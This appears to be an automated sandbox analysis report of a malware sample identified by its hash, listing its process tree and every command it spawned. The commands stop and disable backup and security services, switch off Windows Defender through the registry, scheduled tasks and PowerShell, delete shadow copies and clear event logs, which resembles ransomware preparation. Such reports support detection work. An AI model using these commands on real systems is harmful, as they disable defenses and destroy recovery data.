    PID 4204 wrote to memory of 788  4204  net.exe  net1.exe
    PID 4204 wrote to memory of 788  4204  net.exe  net1.exe
    PID 3328 wrote to memory of 4340  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 4340  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 4340  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 4340 wrote to memory of 4428  4340  net.exe  net1.exe
    PID 4340 wrote to memory of 4428  4340  net.exe  net1.exe
    PID 4340 wrote to memory of 4428  4340  net.exe  net1.exe
    PID 3328 wrote to memory of 4388  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 4388  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 4388  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 4388 wrote to memory of 4276  4388  net.exe  net1.exe
    PID 4388 wrote to memory of 4276  4388  net.exe  net1.exe
    PID 4388 wrote to memory of 4276  4388  net.exe  net1.exe
    PID 3328 wrote to memory of 3200  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 3200  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 3200  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3200 wrote to memory of 3804  3200  net.exe  net1.exe
    PID 3200 wrote to memory of 3804  3200  net.exe  net1.exe
    PID 3200 wrote to memory of 3804  3200  net.exe  net1.exe
    PID 3328 wrote to memory of 316  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 316  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 316  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 316 wrote to memory of 2836  316  net.exe  net1.exe
    PID 316 wrote to memory of 2836  316  net.exe  net1.exe
    PID 316 wrote to memory of 2836  316  net.exe  net1.exe
    PID 3328 wrote to memory of 508  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 508  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 3328 wrote to memory of 508  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  net.exe
    PID 508 wrote to memory of 792  508  net.exe  net1.exe
    PID 508 wrote to memory of 792  508  net.exe  net1.exe
    PID 508 wrote to memory of 792  508  net.exe  net1.exe
    PID 3328 wrote to memory of 888  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 888  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 888  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 892  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 892  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 892  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 1224  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 1224  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 1224  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
    PID 3328 wrote to memory of 1392  3328  cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe  sc.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
    cmd: "C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe"
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID: 3328
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
      PID: 3952
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "SamSs" /y
        PID: 3456
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
      PID: 1984
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "SDRSVC" /y
        PID: 1632
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
      PID: 64
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "SstpSvc" /y
        PID: 4196
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
      PID: 4204
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "UI0Detect" /y
        PID: 788
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "vmicvss" /y
      - Suspicious use of WriteProcessMemory
      PID: 4340
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "vmicvss" /y
        PID: 4428
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
      PID: 4388
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "VSS" /y
        PID: 4276
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
      PID: 3200
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "wbengine" /y
        PID: 3804
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
      PID: 316
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "WebClient" /y
        PID: 2836
  [2] C:\Windows\SysWOW64\net.exe
      cmd: net.exe stop "UnistoreSvc_13048" /y
      - Suspicious use of WriteProcessMemory
      PID: 508
    [3] C:\Windows\SysWOW64\net1.exe
        cmd: C:\Windows\system32\net1 stop "UnistoreSvc_13048" /y
        PID: 792
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "SamSs" start= disabled
      PID: 888
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "SDRSVC" start= disabled
      PID: 892
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "SstpSvc" start= disabled
      PID: 1224
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "UI0Detect" start= disabled
      PID: 1392
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "vmicvss" start= disabled
      PID: 1624
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "VSS" start= disabled
      PID: 1748
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "wbengine" start= disabled
      PID: 2052
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "WebClient" start= disabled
      PID: 2408
  [2] C:\Windows\SysWOW64\sc.exe
      cmd: sc.exe config "UnistoreSvc_13048" start= disabled
      PID: 2712
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
      PID: 2760
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      PID: 3728
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      PID: 3956
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      PID: 4084
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      PID: 4824
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      PID: 2204
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      PID: 1304
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      PID: 2996
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      PID: 4852
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      PID: 4596
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      PID: 4872
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      PID: 4472
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      PID: 5028
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
      PID: 624
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID: 1276
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      PID: 4944
  [2] C:\Windows\SysWOW64\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      PID: 4960
  [2] C:\Windows\SysWOW64\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      PID: 416
  [2] C:\Windows\SysWOW64\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      PID: 2104
  [2] C:\Windows\SysWOW64\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      PID: 1244
  [2] C:\Windows\SysWOW64\schtasks.exe
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      PID: 1588
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
      PID: 1796
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
      PID: 1856
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
      PID: 2124
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
      PID: 2596
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
      PID: 4400
  [2] C:\Windows\SysWOW64\reg.exe
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
      PID: 3304
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4932
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4484
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2304
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3708
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4988 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3092
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:4976 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:364 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3408 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:816 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:4364
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4292 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:3928
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3268 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2136
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2608
Network
MITRE ATT&CK Enterprise v6
Downloads